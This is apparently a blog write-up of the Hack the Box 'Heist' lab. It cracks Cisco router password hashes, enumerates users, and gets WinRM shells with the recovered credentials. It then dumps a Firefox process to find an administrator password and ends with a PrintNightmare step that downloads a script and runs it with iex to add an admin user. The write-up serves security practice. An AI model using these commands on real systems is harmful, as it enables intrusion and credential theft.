Today we are going to solve another CTF challenge “Heist” which is available online for those who want to increase their skill in penetration testing and black box testing. Node is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine

Let’s start with a nmap scan

c:\PENTEST>nmap -p-
Starting Nmap 7.70 ( ) at 2019-12-03 21:04 W. Europe Standard Time
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for
Host is up (0.025s latency).
Not shown: 65530 filtered ports
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49668/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 136.45 seconds

We got smb and http on port 80, and winrm on port 5895

Anonymous authentication wasn’t allowed on smb:

root@kali:/htb# smbclient --list //heist.htb/ -U ''
Enter WORKGROUP\'s password: 
session setup failed: NT_STATUS_LOGON_FAILURE

So let’s check the web service.

Web Enumeration

The index page had a login form, however there was a guest login option:

After getting in as guest I got this issues page:

A user called hazard posted an issue that he’s having some problems with his Cisco router and he attached the configuration file with the issue.
The configuration file had some password hashes and usernames:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 network mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

For the type 7 passwords I used to crack them:

c:\PENTEST>python -d -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword
c:\PENTEST>python -d -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d

And for the other hash I cracked it with john:

root@kali:~/Desktop/HTB/boxes/heist# cat hash.txt 
root@kali:~/Desktop/HTB/boxes/heist# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:01:09 DONE (2019-11-29 12:17) 0.01440g/s 50492p/s 50492c/s 50492C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Enumerating Users –> Shell as Chase –> User Flag

So far we have hazard and rout3r as potential usernames and stealth1agent$uperP@sswordQ4)sJu\Y8qz*A3?d as potential passwords.
I tried different combinations and I could authenticate to smb as hazard : stealth1agent, however there weren’t any useful shares:

root@kali:/htb# smbclient --list //heist.htb/ -U 'hazard'
Enter WORKGROUP\hazard's password: stealth1agent Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. Connection to heist.htb failed (Error NT_STATUS_IO_TIMEOUT) Failed to connect with SMB1 -- no workgroup available

I used from impacket to enumerate the other users:

root@kali:~/htb# hazard:stealth1agent@
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d:

i used evil-winrm from :

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d' -s './ps1_scripts/' -e './exe_files/'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> dir
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 4/22/2019 9:08 AM 121 todo.txt 
-a---- 4/22/2019 9:07 AM 32 user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop>

Administrator Password from Firefox Process Dump –> Shell as Administrator –> Root Flag

After enumerating the box for a while I noticed that Firefox was installed on the box which is unusual:

*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> ls

    Directory: C:\Users\Chase\appdata\Roaming
Mode                LastWriteTime         Length Name                                         ----                -------------         ------ ----                                         d-----        4/22/2019   7:14 AM                Adobe                                       d---s-        4/22/2019   7:14 AM                Microsoft                                   d-----        4/22/2019   8:01 AM                Mozilla                                     *Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> cd Mozilla
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla> ls

    Directory: C:\Users\Chase\appdata\Roaming\Mozilla

Mode                LastWriteTime         Length Name        
----                -------------         ------ ----

d-----        4/22/2019   8:01 AM                Extensions     
d-----        4/22/2019   8:01 AM                Firefox
d-----        4/22/2019   8:01 AM                SystemExtensionsDev
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla> 

And there were some Firefox processes running:

*Evil-WinRM* PS C:\users\chase> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                                                                                                                                                    
-------  ------    -----      -----     ------     --  -- -----------                                                                                                                                                                                    
    452      18     2284       5424               404   0 csrss                                                                                                                                                                                          
    292      17     2288       5240               492   1 csrss                                                                                                                                                                                          
    358      15     3544      14652              5232   1 ctfmon                                                                                                                                                                                         
    164       9     1832       9784       0.09   2008   1 dllhost                                                                                                                                                                                        
    258      14     3988      13460              3952   0 dllhost                                                                                                                                                                                        
    623      32    33768      59456                76   1 dwm                                                                                                                                                                                            
   1501      58    23868      78792              5608   1 explorer                                                                                                                                                                                       
   1135      73   153452     493888      38.55   2660   1 firefox                                                                                                                                                                                        
    407      31    17508      63304       4.22   2996   1 firefox                                                                                                                                                                                        
    390      36    79316     111904      96.61   3960   1 firefox                                                                                                                                                                                        
    343      20    10652      38912       1.31   4052   1 firefox                                                                                                                                                                                        
    358      26    16368      37572       1.06   6200   1 firefox

I uploaded procdump.exe [ It is not needed to put a remote_path if the local file is in the same directory as evilwinrm. rb file ] and dumped one of these processes:

*Evil-WinRM* PS C:\users\chase> .\procdump64.exe -accepteula -ma 2660 firefox.dmp  [14:45:37] Dump 1 initiated: C:\users\chase\firefox.dmp [14:45:37] Dump 1 writing: Estimated dump file size is 494 MB. [14:45:41] Dump 1 complete , next I uploaded strings.exe and used it on the dump and saved the output to another file:

*Evil-WinRM* PS C:\users\chase> upload strings64.exe c:\users\chase
Info: Uploading strings64.exe to c:\users\chase
Data: 218676 bytes of 218676 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\users\chase> cmd /c "strings64.exe -accepteula firefox.dmp > firefox.txt"
cmd.exe : 
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals -
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> upload strings64.exe
Info: Uploading strings64.exe to C:\windows\system32\spool\drivers\color\strings64.exe

Data: 218676 bytes of 218676 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> cmd /c "strings64.exe -accepteula firefox.exe_191129_211531.dmp > firefox.exe_191129_211531.txt"
cmd.exe :
    + CategoryInfo          : NotSpecified: (:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
Strings v2.53 - Search for ANSI and Unicode strings in binary images.       
Copyright (C) 1999-2016 Mark Russinovich             
Sysinternals -
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color>

I searched for the word “admin@” and found Administrator’s credentials exposed in some GET requests:

*Evil-WinRM* PS C:\users\chase> findstr "admin@" ./firefox.txt
facebook extension (malware)","created":"2012-02-13T15:41:02Z"},"enabled":true,"versionRange":[{"severity":3,"maxVersion":"*","minVersion":"0","targetApplication":[]}],"id":"79ad1c9b-0828-78

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u administrator -p '4dD!5}x/re8]FBuZ' -s './ps1_scripts/' -e './exe_files/'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 4/22/2019 9:05 AM 32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt


Beyond Root – PrintNightmare

Heist is vulnerable to CVE-2021-34527, or PrintNightmare.

From chase to Admin, we switch to PowerShell:

puck@parrot-lt:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents>

I’ll start a webserver in the Invoke-Nightmare directory on my host:

puck@parrot-ls$ ls
CVE-2021-1675.ps1  nightmare-dll
oxdf@parrot$ python3 -m http.server 80
Serving HTTP on port 80 ( ...

If I try to upload a copy and load it, Windows blocks that:

PS C:\programdata> wget -outfile ./in.ps1
PS C:\programdata> ls in.ps1

    Directory: C:\programdata

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/9/2022   9:38 AM         178561 in.ps1
PS C:\programdata> Import-Module .\in.ps1
Import-Module : File C:\programdata\in.ps1 cannot be loaded because running scripts is disabled on this system. For 
more information, see about_Execution_Policies at https:/
At line:1 char:1
+ Import-Module .\in.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

However, I can just Invoke-Expression (or iex) the code. I can do so right from the webserver:

PS C:\programdata> iex(new-object net.webclient).downloadstring('')

Or from the local copy:

PS C:\programdata> iex(cat in.ps1 -raw)

Either way, the code is now loaded. Now I can run it to add a user:

PS C:\programdata> Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
[+] created payload at C:\Users\chase\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll"
[+] added user puck as local administrator
[+] deleting payload from C:\Users\chase\AppData\Local\Temp\nightmare.dll

With admin priv, I can WMIexec to get remote execution as SYSTEM:

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *